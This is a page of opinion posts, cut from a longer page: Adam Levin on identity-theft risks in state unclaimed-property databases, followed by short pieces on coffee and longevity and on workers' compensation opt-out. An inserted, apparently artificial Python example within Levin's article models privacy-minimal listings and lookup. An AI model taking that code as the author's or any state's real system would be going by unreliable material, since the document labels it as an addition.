That said, there is a reason to feel uncomfortable—or even outright concerned—to find your name on a list of people with unclaimed property. After all, you didn’t give anyone permission to put it there. The way a person manages her affairs (or doesn’t) should not be searchable on a public database like a scarlet letter just waiting to be publicized. Then there’s the more practical reason that it matters. Identity thieves rely on sloppiness. Scams thrive where there is a lack of vigilance (lamentably, a lifestyle choice for many Americans despite the rise of identity-related crimes). The crux of the problem when it comes to reporting unclaimed property: It’s impossible to be guarded and careful about something you don’t even know exists, and, of course, it’s much easier to steal something if you know that it does. The worst of the state unclaimed property databases provide a target-rich environment for thieves interested in grabbing the more than $58 billion in unclaimed funds held by agencies at the state level across the country.

States’ response to questions about public databases

When we asked for comment from the eight states that received the worst rating in our compendium—California, Hawaii, Indiana, Iowa, Nevada, South Dakota, Texas and Wisconsin—five replied. In an effort to continue the dialogue around this all-too-important topic, here are a few of the responses from the states:

-- California said: “The California state controller has a fraud detection unit that takes proactive measures to ensure property is returned to the rightful owners. We have no evidence that the limited online information leads to fraud.” The “limited online information” available to the public on the California database provides name, street address, the company that held the unclaimed funds and the exact amount owed, unless the property is something with a movable valuation like equity or commodities. To give just one example, we found a $50 credit at Tiffany associated with a very public figure. We were able to verify it because the address listed in the California database had been referenced in a New York Times article about the person of interest. Just those data points could be used by a scammer to trick Tiffany or the owner of the unclaimed property (or the owner's representatives) into handing over more information (to be used elsewhere in the commission of fraud) or money (a finder’s fee is a common ruse) or both. This policy seems somewhat at odds with California’s well-earned reputation as one of the most consumer-friendly states in the nation when it comes to data privacy and security.

-- Hawaii’s response: “We carefully evaluated the amount and type of information to be provided and consulted with our legal counsel to ensure that no sensitive personal information was being provided.” My response: Define “sensitive.” These days, name, address and email address (reflect upon the millions of these that are “out there” in the wake of the Target and Home Depot breaches) are all scammers need to start exploiting your identity. The more information they have, the more opportunities they can create, leveraging that information, to get more until they have enough to access your available credit or financial accounts.

-- Indiana’s response was thoughtful. “By providing the public record, initially we are hoping to eliminate the use of a finder, which can charge up to 10% of the property amount. Providing the claimant the information up front, they are more likely to use our service for free. That being said, we are highly aware of the fraud issue and, as you may know, Indiana is the only state in which the Unclaimed Property Division falls under the Attorney General’s office. This works to our advantage in that we have an entire investigative division in-house and specific to unclaimed property. In addition, we also have a proactive team that works to reach out to rightful owners directly on higher-dollar claims to reduce fraud and to ensure those large dollar amounts are reaching the rightful owners.”

Protect and serve should be the goal

While Indiana has the right idea, the state still provides too much information. The concept here is to protect and serve—something the current system of unclaimed property databases does not do. The methodology used in the compendium was quite simple: The less information a state provided, the better its ranking. Four stars was the best rating—it went to states that provided only a name and city or ZIP code—and one star was the worst, awarded to states that disclosed name, street address, property type, property holder and exact amount owed.

In the majority of states in the U.S., the current approach to unclaimed funds doesn’t appear to be calibrated to protect consumers during this ever-growing epidemic of identity theft and cyber fraud. The hit parade of data breaches over the past few years—Target, Home Depot, Sony Pictures, Anthem and, most recently, the Office of Personnel Management—provides a case-by-case view of the evolution of cybercrime. Whether access was achieved by malware embedded in a spear-phishing email or came by way of an intentionally infected vendor, the ingenuity of fraudsters continues apace, and it doesn’t apply solely to mega databases. Identity thieves make a living looking for exploitable mistakes. The 50 State Compendium provides a state-by-state look at mistakes just waiting to be converted by fraudsters into crimes.

The best way to keep your name off those lists: Stay on top of your finances, cash your checks and keep tabs on your assets. (And check your credit reports regularly to spot signs of identity fraud. You can get your free credit reports every year from the major credit reporting agencies, and you can get a free credit report summary from Credit.com every month for a more frequent overview.) In the meantime, states need to re-evaluate the best practices for getting unclaimed funds to consumers. One possibility may be to create a search process that can only be initiated by the consumer submitting his name and city (or cities) on a secure government website.
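To make the compendium's data-minimization principle concrete, here is an added example (not IDT911's scoring code and not any state's system) that scores a listing by the fields it publishes, projects an internal record down to the four-star view, and implements the consumer-initiated lookup the article suggests: name and city in, a bare match confirmation out, with holder, street and amount never leaving the treasury. The record field names, the two- and three-star interpolation and the sample data are assumptions.

```python
from dataclasses import dataclass

# Fields whose publication the compendium penalizes (a one-star state publishes
# name, street address, property type, holder and exact amount owed).
SENSITIVE_FIELDS = {"street_address", "property_type", "holder", "amount"}
# A four-star state publishes only a name plus city or ZIP code.
MINIMAL_FIELDS = {"owner_name", "city", "zip_code"}
KNOWN_FIELDS = SENSITIVE_FIELDS | MINIMAL_FIELDS


@dataclass(frozen=True)
class UnclaimedPropertyRecord:
    """Internal treasury record. Field names are assumed, not a real state schema."""
    claim_id: str
    owner_name: str
    street_address: str
    city: str
    zip_code: str
    property_type: str
    holder: str
    amount: float


def star_rating(published_fields: set[str]) -> int:
    """Score a public listing the way the compendium does: fewer fields, more stars.
    Four stars = name plus city/ZIP only; one star = the sensitive fields exposed.
    Two and three stars (one or two sensitive fields leaked) are an assumed interpolation."""
    unknown = published_fields - KNOWN_FIELDS
    if unknown:
        raise ValueError(f"unknown listing fields: {sorted(unknown)}")
    leaked = len(published_fields & SENSITIVE_FIELDS)
    return max(1, 4 - leaked)


def public_view(record: UnclaimedPropertyRecord) -> dict:
    """Project a record to the four-star listing: name and city only."""
    return {"owner_name": record.owner_name, "city": record.city}


def _normalize(text: str) -> str:
    # Case- and whitespace-insensitive comparison so a consumer's typing matches the record.
    return " ".join(text.strip().lower().split())


def consumer_initiated_search(records, owner_name: str, city: str) -> list[dict]:
    """The search the article proposes: the consumer supplies name and city, and the
    response confirms only that a claim exists and which claim id to pursue. Holder,
    amount and street address are released only through the vetted claim process."""
    name, town = _normalize(owner_name), _normalize(city)
    if not name or not town:
        raise ValueError("both name and city are required to start a search")
    return [
        {"claim_id": r.claim_id, "owner_name": r.owner_name, "city": r.city}
        for r in records
        if _normalize(r.owner_name) == name and _normalize(r.city) == town
    ]


# Constructed sample records, not real unclaimed-property data.
SAMPLE_RECORDS = [
    UnclaimedPropertyRecord("ST-0001", "Jane Doe", "123 Example St", "Sacramento",
                            "95814", "credit balance", "Example Retailer", 50.00),
    UnclaimedPropertyRecord("ST-0002", "John Roe", "9 Sample Ave", "Fresno",
                            "93721", "uncashed check", "Example Utility", 120.00),
]

# The field set a one-star state publishes, per the article, beside the four-star baseline.
ONE_STAR_LISTING = {"owner_name", "street_address", "property_type", "holder", "amount"}
FOUR_STAR_LISTING = {"owner_name", "city"}

if __name__ == "__main__":
    print("one-star listing scores", star_rating(ONE_STAR_LISTING))
    print("four-star listing scores", star_rating(FOUR_STAR_LISTING))
    print(public_view(SAMPLE_RECORDS[0]))
    print(consumer_initiated_search(SAMPLE_RECORDS, "jane doe", "SACRAMENTO"))
```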

Adam Levin

Adam K. Levin is a consumer advocate and a nationally recognized expert on security, privacy, identity theft, fraud, and personal finance. A former director of the New Jersey Division of Consumer Affairs, Levin is chairman and founder of IDT911 (Identity Theft 911) and chairman and co-founder of Credit.com.

How to Live Longer? Drink More Coffee

A study by the NIH found that men who were heavy coffee drinkers were 10% less likely to die during the study; women, 15%.

This idea is taken from The Doctor Weighs In post by Dov Michaeli. As the article says, “Coffee drinkers have a reduced risk of dying prematurely from all causes, and consequently live longer.” Coffee is a “vice” that is most worthy, and one to be embraced. Some health attributes of coffee include reduced risks of death from:
  • Cardiac arrhythmia
  • Type 2 diabetes
  • Dementia
  • Pneumonia
  • Lung disease
  • Accidents
  • Strokes
That’s quite a list. The good news is that a 50-cent cup of coffee works as well as a five-dollar cup. Any amount of coffee is better than none. According to results of a study by the National Institutes of Health (NIH), “Compared with people who drank no coffee at all, men and women who drank six or more cups per day were 10% and 15% less likely, respectively, to die during the study.” Don’t tell wellness true believers about this. They may want to start charging coffee-free employees a higher health payroll deduction.

Tom Emerick

Tom Emerick is president of Emerick Consulting and cofounder of EdisonHealth and Thera Advisors. Emerick’s years with Wal-Mart Stores, Burger King, British Petroleum and American Fidelity Assurance have provided him with an excellent blend of experience and contacts.

Debunking 'Opt-Out' Myths (Part 3)

Too much of the discussion to date has been devoid of any spirit of inquiry, as "opt-out" opponents attempt to promote class warfare.

This is the third of eight parts. The first article in the series is here. The second article in the series is here. Workers’ compensation is a mysterious realm. Just pick a state. Even those of us who regularly read workers’ compensation statutes, regulations and official government websites have great difficulty triangulating the truth about basic rights and responsibilities for injured workers. The little communication provided to injured workers tends to be oversimplified, leaving them no choice but to hire a lawyer to navigate the system. In fact, armies of trial lawyers, insurance and claims personnel and government employees are needed for basic functions of workers’ compensation systems. These armies then find much to argue over, which drives an endless pursuit of “reforms.” Even the industry’s biggest proponents and thought leaders complain of dysfunction. OSHA has also now joined the chorus claiming that workers’ compensation systems “add inequality to injury” and shift too much cost to injured workers and other government programs. Against this backdrop, we’ve seen the Texas “nonsubscriber option” (often referred to as "opt-out") grow to cover considerably more than one million workers and successfully handle more than 50,000 injury claims a year. A more highly regulated “Oklahoma option” launched in 2014 and has withstood two challenges at the Oklahoma Supreme Court. Statistically credible data demonstrates that better outcomes for employees can be achieved through more deliberate, easy-to-understand communication that supports requirements for employee accountability. Such simple injury management principles have resulted in billions of dollars in employer savings and economic development. Now, both Tennessee and South Carolina are considering option legislation, with several other states wondering if they should do the same. 
Having worked on legislation and regulatory systems related to option programs for more than 25 years, I can understand the initial confusion and distrust by option opponents. Moving from a hyper-regulated, almost exclusively state-regulated system to a more free-market alternative that relies on a combination of state and federal laws takes people out of their comfort zone. They have legitimate questions that deserve good answers. But too much of the discussion to date has been devoid of any spirit of inquiry. Workers’ compensation carrier associations issue fallacious descriptions of the purpose and mechanics of option programs. Allegations by plaintiff attorneys in lawsuits are quoted by workers’ comp industry media as irrefutable facts. Instead of research, option opponents attempt to promote class warfare while falsely disparaging reputable employers. In the midst of this chaos, only one thing is sure: We are in a period of transition, and the facts will emerge, one way or the other. In-depth information about options to workers’ compensation is more accessible every day. For those who are willing to have a reasoned public policy dialogue and information exchange, a path of progress emerges. For those who prefer uninformed hostility over homework, their true intentions will become more obvious, and their voices will be less credible as the days go by.

Bill Minick

Bill Minick is the president of PartnerSource, a consulting firm that has helped deliver better benefits and improved outcomes for tens of thousands of injured workers and billions of dollars in economic development through "options" to workers' compensation over the past 20 years.